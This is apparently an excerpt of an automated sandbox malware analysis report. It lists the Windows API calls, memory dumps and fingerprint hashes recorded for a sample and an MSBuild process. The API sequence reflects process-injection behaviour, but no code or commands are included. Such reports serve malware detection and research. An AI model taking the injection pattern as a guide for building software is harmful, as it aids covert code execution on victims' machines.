                                                                                                                              • Instruction Fuzzy Hash: 1F714770A01B058FE725DF6AD84475ABBF2FF88210F008A2DD146DBB50D775E945CB91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 016E59A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: f3f521ec7b771b71495ba12f8c783f4d898d0bfa74a3e8177e7f2ca0e1de7ac1
                                                                                                                              • Instruction ID: 4da3bef0a8ed25a2587713a16454016f95e410da52be1f2312d4bc8d6103defb
                                                                                                                              • Opcode Fuzzy Hash: f3f521ec7b771b71495ba12f8c783f4d898d0bfa74a3e8177e7f2ca0e1de7ac1
                                                                                                                              • Instruction Fuzzy Hash: B241D174D00719CFDB24DFAAC844ADEBBF5BF84304F20815AD409AB251DB756946CF90

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 016E59A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 8a47af3c84aec1ddf523c877cf65a7c61507d906e284ed997fded83d67234f0d
                                                                                                                              • Instruction ID: b61fb10046371fb54daacc71d41d25ba33c0f8f31fe4ad8f44c27a31b357fce8
                                                                                                                              • Opcode Fuzzy Hash: 8a47af3c84aec1ddf523c877cf65a7c61507d906e284ed997fded83d67234f0d
                                                                                                                              • Instruction Fuzzy Hash: 6E41CF74C0071DCBDB24DFAAC844B8EBBF5BF89304F20816AD409AB251DB75A946CF90

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 1c01df0418628e55305f8cc5731ec4c64a862bc8492414e0389ecba6c3e78403
                                                                                                                              • Instruction ID: 595ea1e5e4e98af56dadd1baa39af590d7d0c516452fc716180955c47ef74e8d
                                                                                                                              • Opcode Fuzzy Hash: 1c01df0418628e55305f8cc5731ec4c64a862bc8492414e0389ecba6c3e78403
                                                                                                                              • Instruction Fuzzy Hash: 73319EB1904399EFCB11CFAAD844AEABFF8EF49310F14805AE654AB351C3359850DFA1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076CCA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0

                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076CCA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0

                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076BE8A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0

                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076BE6F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0

                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076BE980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076C3482,?,?,?,?,?), ref: 076C3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076BE7BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016EB2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BB91D25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2546795081.000000000BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_bb90000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 3cdcad95e06505c2f76a3d7bb55f39d26cd1fc6f7ee813a6d96897c10aa24ead
                                                                                                                              • Instruction ID: ef59f212a77f406ec7bf205a9c4d559040982a05ebd43adc8f5ac6d6452d33e4
                                                                                                                              • Opcode Fuzzy Hash: 3cdcad95e06505c2f76a3d7bb55f39d26cd1fc6f7ee813a6d96897c10aa24ead
                                                                                                                              • Instruction Fuzzy Hash: 601115B5800349DFDB10CF9AD844BDEFBF8EB48724F108459E518A7200C375A544CFA5
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BB91D25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2546795081.000000000BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_bb90000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 938800ad1283a56c502e8f81c32a9939e735b5d46ad10337d1c95ac9fb57f391
                                                                                                                              • Instruction ID: 69bd4101bd94bb346b47c2f0e8558eebd9868ff8c7d14774b6f50e505cfc05ee
                                                                                                                              • Opcode Fuzzy Hash: 938800ad1283a56c502e8f81c32a9939e735b5d46ad10337d1c95ac9fb57f391
                                                                                                                              • Instruction Fuzzy Hash: E511F2B5800249DFDB10CF99D985BDEBBF4EF48324F10885AD558A7600C375A554CFA5

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:2.2%
                                                                                                                              Total number of Nodes:184
                                                                                                                              Total number of Limit Nodes:14

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebc146-2ebc158)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 9da291daf1f1ed864637551b54fbc7e089253b243cdd1ca900fe4591bddb8cc9
                                                                                                                              • Instruction ID: c5fb97d6bc7f7fcb043870aa8c1419d0a903505e02ae5474de2d9ed90a44a497
                                                                                                                              • Opcode Fuzzy Hash: 9da291daf1f1ed864637551b54fbc7e089253b243cdd1ca900fe4591bddb8cc9
                                                                                                                              • Instruction Fuzzy Hash: 17A1D974E44258CFDB15CFA9D884A9EBBF2BF89314F24D0AAE409AB351DB349841CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2eb5362-2eb5364)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 6470f5dfaf9b1235a280d73cb1a411b79857878c226d716ffc42118a9910e813
                                                                                                                              • Instruction ID: 2dfd37c0176588642ae50dcd4a001aba1f112665e084cb66900dede80121b923
                                                                                                                              • Opcode Fuzzy Hash: 6470f5dfaf9b1235a280d73cb1a411b79857878c226d716ffc42118a9910e813
                                                                                                                              • Instruction Fuzzy Hash: 9991C074E402588FDB15CFAAD884ADEBBF2BF88301F54D0A9E449AB365DB349941CF10

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebc468-2ebc46d)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 4bf8f375a877da56c7c1326c5ed57d41783a6c8238d62531c01e5307ec6ede5b
                                                                                                                              • Instruction ID: 7dc23ec93f2d7fcac0a7ebb4e80f72d8049b0e9ebef1a93f73d68c3754682cbb
                                                                                                                              • Opcode Fuzzy Hash: 4bf8f375a877da56c7c1326c5ed57d41783a6c8238d62531c01e5307ec6ede5b
                                                                                                                              • Instruction Fuzzy Hash: 1991D474E442588FDB15CFAAD884ADEBBF2BF88304F24E06AD419AB355DB349941CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebca08-2ebca16)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 3136140c6fdff1c56b81428f40cd4cabb2eab1e39e395e4ecd029db679552260
                                                                                                                              • Instruction ID: 5e0f97ec9d4bb04f0019e2e012b7a396c026cbf46eb56caaa2a0c07c2e1bc3ad
                                                                                                                              • Opcode Fuzzy Hash: 3136140c6fdff1c56b81428f40cd4cabb2eab1e39e395e4ecd029db679552260
                                                                                                                              • Instruction Fuzzy Hash: E481A074E402188FDB14DFAAD894A9EBBF2BF88300F24D06AD419AB265DB349941CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebd278-2ebd286)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 804b703d95c662ed4ac916a218402939883a2c2838998556427cc792afd15991
                                                                                                                              • Instruction ID: ce2a3f67d81267d30c5642c0c1282ebad90f74070510a0f47366f035096c6f9d
                                                                                                                              • Opcode Fuzzy Hash: 804b703d95c662ed4ac916a218402939883a2c2838998556427cc792afd15991
                                                                                                                              • Instruction Fuzzy Hash: 78819274E40218CFDB14DFAAD984A9EBBF2BF88310F14D069E409AB365DB349941CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebc738-2ebc746)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 3907f3d20bc7024d1d7e0a09b3d191881616fcc27ce157984f0f48c36b1e3f7d
                                                                                                                              • Instruction ID: 6ea5e3cba4860ce72cecc90d403098b8d6b527550d1bc960e1bd29540265aafa
                                                                                                                              • Opcode Fuzzy Hash: 3907f3d20bc7024d1d7e0a09b3d191881616fcc27ce157984f0f48c36b1e3f7d
                                                                                                                              • Instruction Fuzzy Hash: 7A81B274E40218CFEB15DFAAD944A9EBBF2BF88304F24D06AD419AB355DB349941CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebccd8-2ebcce6)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 70a28db24209f3354074e2a8347516f4a43401198edd9f45d0572da7f650c0ec
                                                                                                                              • Instruction ID: b11d82d0407af13989ae036be7428365b350ac7fec1d1e83e54f42ca252e7d6c
                                                                                                                              • Opcode Fuzzy Hash: 70a28db24209f3354074e2a8347516f4a43401198edd9f45d0572da7f650c0ec
                                                                                                                              • Instruction Fuzzy Hash: 9F81B474E40218DFDB14DFAAD844AAEBBF2BF88304F24D06AD419AB355DB349941CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 2ebcfaa-2ebcfb6)
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 33b972d75c8b43640231c5216eaaee849d5a2e12c0af15337f1df1d821a7439f
                                                                                                                              • Instruction ID: 7882d9aac69ab5aead1536d8ede5020c5c7b3eab57f4415eb03231deae379056
                                                                                                                              • Opcode Fuzzy Hash: 33b972d75c8b43640231c5216eaaee849d5a2e12c0af15337f1df1d821a7439f
                                                                                                                              • Instruction Fuzzy Hash: 6D819074E40258CFDB15DFAAD884A9EBBF2BF88304F14D069E419AB365DB349981CF50

                                                                                                                              Control-flow Graph (image not captured; first basic block 6ab9548-6ab9577)

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 477b782b25dc0f3183ec645050c32c0c2fba5340027a5f84afdcb1137b6ca7b6
                                                                                                                              • Instruction ID: 5840ffe2068032ca05da00579bdb5c71b89905f497a343eb54204519a365b566
                                                                                                                              • Opcode Fuzzy Hash: 477b782b25dc0f3183ec645050c32c0c2fba5340027a5f84afdcb1137b6ca7b6
                                                                                                                              • Instruction Fuzzy Hash: D8814970A00B458FEB69DF2AD44075ABBF2FF88304F10892ED59ADBA40D774E945CB91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 22e554291d67fb9ae39527ab2b52087667190088b8e6eab308b29769a4ab676c
                                                                                                                              • Instruction ID: f0fd8b19bba0081339b2b2d2c6e79e67a684472072c6392a62e57201f728626e
                                                                                                                              • Opcode Fuzzy Hash: 22e554291d67fb9ae39527ab2b52087667190088b8e6eab308b29769a4ab676c
                                                                                                                              • Instruction Fuzzy Hash: 1F51B1B1D102499FDF18CF9AC980ADEBBB5FF48310F24812AE818AB250D7759945CF90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: bb66a42792a6d421d4eec6b5e57ebf372603306ee8ebdbfdeb9d9f2403749d7d
                                                                                                                              • Instruction ID: e66d12bed5672b74b7e0bf3bbf9f120aa5e5cab2fef7edc5643b30fff3780c4e
                                                                                                                              • Opcode Fuzzy Hash: bb66a42792a6d421d4eec6b5e57ebf372603306ee8ebdbfdeb9d9f2403749d7d
                                                                                                                              • Instruction Fuzzy Hash: F151C0B1D102099FDF18CF9AC884ADEBBB5FF48310F24812AE819AB250D7749981CF90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0119A131
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 32f8d143470a214bd2fa68c3d16a6af4f853af4d47dec4ce40ccaf616d13af1e
                                                                                                                              • Instruction ID: 2740fd011bc736fc19c527fe719a9610abc8e0ec5a990217b7560874812a3a7b
                                                                                                                              • Opcode Fuzzy Hash: 32f8d143470a214bd2fa68c3d16a6af4f853af4d47dec4ce40ccaf616d13af1e
                                                                                                                              • Instruction Fuzzy Hash: FB411AB4900309CFDB18CF99C848AAAFBF5FF89314F25C459D519AB321D734A845CBA0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06AB9A6E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3589729156.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_6ab0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4bf9f0da8562345b642d8288f211648e8810c1d137d5c08d44ec700aeea6dfbf
                                                                                                                              • Instruction ID: 9293039648d8a46fa86757b9dff479c1046dfc71f41d4d9dbe4abb9dc5643e7c
                                                                                                                              • Opcode Fuzzy Hash: 4bf9f0da8562345b642d8288f211648e8810c1d137d5c08d44ec700aeea6dfbf
                                                                                                                              • Instruction Fuzzy Hash: BA119074E002089FEB44EBE8C484AEEBBF9FF89304F109158E904E7202D7309942CF50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0119576C), ref: 011959A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8c31e3c9e925391aeb3cd896edd3a40e13eb8caf65da4de3d103423fec1ffd70
                                                                                                                              • Instruction ID: 58baf338f1466ea8c022640ead9ecfa1bf4e6ee519a7b3704faf86decf27e1db
                                                                                                                              • Opcode Fuzzy Hash: 8c31e3c9e925391aeb3cd896edd3a40e13eb8caf65da4de3d103423fec1ffd70
                                                                                                                              • Instruction Fuzzy Hash: 0D518474E01208DFDB54DFAAD9849DDBBF2BF89300F209169E819AB365DB31A905CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b81f929809a81e497e817dd45e76063b95910d1baefa9ea72a134146016eca22
                                                                                                                              • Instruction ID: 5b237aa3f12422101dc545ad5be69871ca9bfb9c953114953c498cf0d2e5ca93
                                                                                                                              • Opcode Fuzzy Hash: b81f929809a81e497e817dd45e76063b95910d1baefa9ea72a134146016eca22
